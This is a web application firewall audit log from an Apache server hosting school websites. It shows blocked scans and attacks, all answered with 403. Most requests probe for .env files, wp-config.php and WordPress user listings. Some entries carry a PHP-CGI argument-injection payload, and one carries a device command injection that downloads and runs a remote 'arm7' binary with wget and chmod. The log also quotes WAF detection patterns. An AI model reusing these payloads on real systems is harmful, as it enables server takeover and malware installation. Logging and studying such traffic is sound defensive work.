Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 14.18.120.74 (141+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost
Stopwatch: 1745516908289210 4978 (- - -)
Stopwatch2: 1745516908289210 4978; combined=3755, p1=431, p2=3137, p3=0, p4=0, p5=110, sr=88, sw=77, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d6e1ad49-Z--
--21ef3347-A--
[25/Apr/2025:01:31:14 +0700] aAqDcmLuk3f9kLjsdTa-LgAAAIs 103.236.140.4 35196 103.236.140.4 8181
--21ef3347-B--
POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.138.171
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.138.171
X-Forwarded-Proto: https
Connection: close
Content-Length: 110
User-Agent: python-requests/2.32.3
Accept: */*
Content-Type: application/x-www-form-urlencoded
--21ef3347-C--
--21ef3347-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--21ef3347-E--
--21ef3347-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745519474667632 4577 (- - -)
Stopwatch2: 1745519474667632 4577; combined=3203, p1=467, p2=2703, p3=0, p4=0, p5=32, sr=63, sw=1, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--21ef3347-Z--
--6ef3ef29-A--
[25/Apr/2025:01:40:44 +0700] aAqFrN5yz20UX9VrdZMGFgAAAEs 103.236.140.4 49642 103.236.140.4 8181
--6ef3ef29-B--
GET /.env HTTP/1.0
Host: archiexnz.chickenkiller.com
X-Real-IP: 46.101.111.185
X-Forwarded-Host: archiexnz.chickenkiller.com
X-Forwarded-Server: archiexnz.chickenkiller.com
X-Forwarded-For: 46.101.111.185
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--6ef3ef29-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6ef3ef29-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745520044087495 739 (- - -)
Stopwatch2: 1745520044087495 739; combined=320, p1=267, p2=0, p3=0, p4=0, p5=52, sr=72, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6ef3ef29-Z--
--f5f86442-A--
[25/Apr/2025:02:05:09 +0700] aAqLZclQo524fhbIj1zWfgAAAA0 103.236.140.4 44850 103.236.140.4 8181
--f5f86442-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 113.160.182.42
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 113.160.182.42
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--f5f86442-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f5f86442-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745521509425365 3272 (- - -)
Stopwatch2: 1745521509425365 3272; combined=1432, p1=437, p2=962, p3=0, p4=0, p5=33, sr=79, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f5f86442-Z--
--9a5cdc7a-A--
[25/Apr/2025:02:11:04 +0700] aAqMyMlQo524fhbIj1zXSwAAABA 103.236.140.4 46222 103.236.140.4 8181
--9a5cdc7a-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 54.36.61.94
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 54.36.61.94
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--9a5cdc7a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--9a5cdc7a-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745521864921252 2859 (- - -)
Stopwatch2: 1745521864921252 2859; combined=1279, p1=420, p2=829, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--9a5cdc7a-Z--
--a809ff1f-A--
[25/Apr/2025:02:32:58 +0700] aAqR6slQo524fhbIj1zYkQAAAA8 103.236.140.4 51448 103.236.140.4 8181
--a809ff1f-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 36.95.35.57
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 36.95.35.57
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--a809ff1f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a809ff1f-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745523178032644 2403 (- - -)
Stopwatch2: 1745523178032644 2403; combined=1305, p1=399, p2=868, p3=0, p4=0, p5=38, sr=70, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a809ff1f-Z--
--8cadf627-A--
[25/Apr/2025:02:40:28 +0700] aAqTrMlQo524fhbIj1zY8wAAAAs 103.236.140.4 53324 103.236.140.4 8181
--8cadf627-B--
GET /wp-config.php HTTP/1.1
Host: perpustakaan.smkn22jakarta.sch.id
X-Real-IP: 188.166.47.25
X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id
X-Forwarded-Proto: http
Accept: */*
User-Agent: Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36Team Anon Force
Cookie:
X-Forwarded-For: 188.166.47.25
Accept-Encoding: gzip
X-Varnish: 136635919
--8cadf627-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Content-Type: text/html; charset=iso-8859-1
--8cadf627-H--
Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745523628683195 804 (- - -)
Stopwatch2: 1745523628683195 804; combined=293, p1=258, p2=0, p3=0, p4=0, p5=35, sr=69, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8cadf627-Z--
--58bbf30c-A--
[25/Apr/2025:02:41:12 +0700] aAqT2MlQo524fhbIj1zZAQAAAAA 103.236.140.4 53588 103.236.140.4 8181
--58bbf30c-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 62.240.2.196
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 62.240.2.196
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--58bbf30c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--58bbf30c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745523672341796 2689 (- - -)
Stopwatch2: 1745523672341796 2689; combined=1347, p1=459, p2=859, p3=0, p4=0, p5=29, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--58bbf30c-Z--
--f2f58752-A--
[25/Apr/2025:02:46:56 +0700] aAqVMGLuk3f9kLjsdTbIxgAAAIs 103.236.140.4 55494 103.236.140.4 8181
--f2f58752-B--
POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.137.162
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.137.162
X-Forwarded-Proto: http
Connection: close
Content-Length: 110
User-Agent: python-requests/2.32.3
Accept: */*
Content-Type: application/x-www-form-urlencoded
--f2f58752-C--
--f2f58752-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f2f58752-E--
--f2f58752-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745524016934292 3826 (- - -)
Stopwatch2: 1745524016934292 3826; combined=2675, p1=448, p2=2196, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f2f58752-Z--
--64ae563b-A--
[25/Apr/2025:03:05:35 +0700] aAqZj_iVYlyO1xhz7yMCxwAAAMU 103.236.140.4 59986 103.236.140.4 8181
--64ae563b-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 92.51.122.150
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 92.51.122.150
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--64ae563b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--64ae563b-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745525135017429 3597 (- - -)
Stopwatch2: 1745525135017429 3597; combined=2356, p1=716, p2=1601, p3=0, p4=0, p5=38, sr=76, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--64ae563b-Z--
--13a47f0c-A--
[25/Apr/2025:03:33:21 +0700] aAqgEeOdEP6frSVs8CoeEwAAABA 103.236.140.4 48350 103.236.140.4 8181
--13a47f0c-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 109.123.236.200
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 109.123.236.200
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--13a47f0c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--13a47f0c-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745526801600158 3375 (- - -)
Stopwatch2: 1745526801600158 3375; combined=1433, p1=508, p2=895, p3=0, p4=0, p5=30, sr=129, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--13a47f0c-Z--
--34c45516-A--
[25/Apr/2025:03:46:00 +0700] aAqjCPKu9d5eAb6Kn9_aqAAAANY 103.236.140.4 51360 103.236.140.4 8181
--34c45516-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.80.2
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.80.2
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36
Accept-Charset: utf-8
--34c45516-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--34c45516-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745527560556398 688 (- - -)
Stopwatch2: 1745527560556398 688; combined=268, p1=235, p2=0, p3=0, p4=0, p5=33, sr=62, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--34c45516-Z--
--8b8dc04b-A--
[25/Apr/2025:03:58:04 +0700] aAql3OOdEP6frSVs8CofwQAAAAo 103.236.140.4 54138 103.236.140.4 8181
--8b8dc04b-B--
POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3Brm%20arm7%3B%20wget%20http%3A%2F%2F212.18.104.182%2Farm7%3B%20chmod%20777%20%2A%3B%20.%2Farm7%20tbk HTTP/1.0
Host: 103.236.140.4
Cookie: uid=admin
X-Real-IP: 5.183.209.244
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 5.183.209.244
X-Forwarded-Proto: http
Connection: close
Accept: */*
User-Agent: Mozila/5.0
--8b8dc04b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8b8dc04b-H--
Message: Access denied with code 403 (phase 1). Operator EQ matched 0 at REQUEST_HEADERS. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "41"] [id "210280"] [rev "4"] [msg "COMODO WAF: HTTP/1.0 POST request missing Content-Length Header||103.236.140.4|F|4"] [data "0"] [severity "WARNING"] [tag "CWAF"] [tag "Protocol"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745528284666643 903 (- - -)
Stopwatch2: 1745528284666643 903; combined=395, p1=344, p2=0, p3=0, p4=0, p5=51, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8b8dc04b-Z--
--1c47940c-A--
[25/Apr/2025:04:15:09 +0700] aAqp3T8HMZgF-3Y3GtE3AAAAAEo 103.236.140.4 58182 103.236.140.4 8181
--1c47940c-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 64.23.236.146
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 64.23.236.146
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--1c47940c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1c47940c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745529309094528 879 (- - -)
Stopwatch2: 1745529309094528 879; combined=373, p1=334, p2=0, p3=0, p4=0, p5=39, sr=120, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1c47940c-Z--
--a2c47b02-A--
[25/Apr/2025:04:56:19 +0700] aAqzgz8HMZgF-3Y3GtE5NQAAAEQ 103.236.140.4 39476 103.236.140.4 8181
--a2c47b02-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 179.189.200.35
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 179.189.200.35
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--a2c47b02-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a2c47b02-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745531779393006 2706 (- - -)
Stopwatch2: 1745531779393006 2706; combined=1510, p1=444, p2=1035, p3=0, p4=0, p5=31, sr=92, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a2c47b02-Z--
--12f21b2b-A--
[25/Apr/2025:05:03:40 +0700] aAq1POXF4ZX3hX-IbN6ZtwAAAJY 103.236.140.4 41206 103.236.140.4 8181
--12f21b2b-B--
GET /.env HTTP/1.0
Host: petruk.hauganslekt.no
X-Real-IP: 143.244.168.161
X-Forwarded-Host: petruk.hauganslekt.no
X-Forwarded-Server: petruk.hauganslekt.no
X-Forwarded-For: 143.244.168.161
X-Forwarded-Proto: https
Connection: close
User-Agent: Go-http-client/1.1
--12f21b2b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--12f21b2b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745532220560083 872 (- - -)
Stopwatch2: 1745532220560083 872; combined=347, p1=310, p2=0, p3=0, p4=0, p5=37, sr=75, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--12f21b2b-Z--
--6a434c26-A--
[25/Apr/2025:05:13:45 +0700] aAq3meOdEP6frSVs8CokmAAAABc 103.236.140.4 43562 103.236.140.4 8181
--6a434c26-B--
GET /wp-json/wp/v2/users/ HTTP/1.0
Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/
Host: smkn22-jkt.sch.id
X-Real-IP: 192.99.63.110
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 192.99.63.110
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36
--6a434c26-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--6a434c26-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745532825415492 3253 (- - -)
Stopwatch2: 1745532825415492 3253; combined=1409, p1=443, p2=936, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--6a434c26-Z--
--68f10a6b-A--
[25/Apr/2025:05:29:04 +0700] aAq7MD8HMZgF-3Y3GtE77gAAAEU 103.236.140.4 48548 103.236.140.4 8181
--68f10a6b-B--
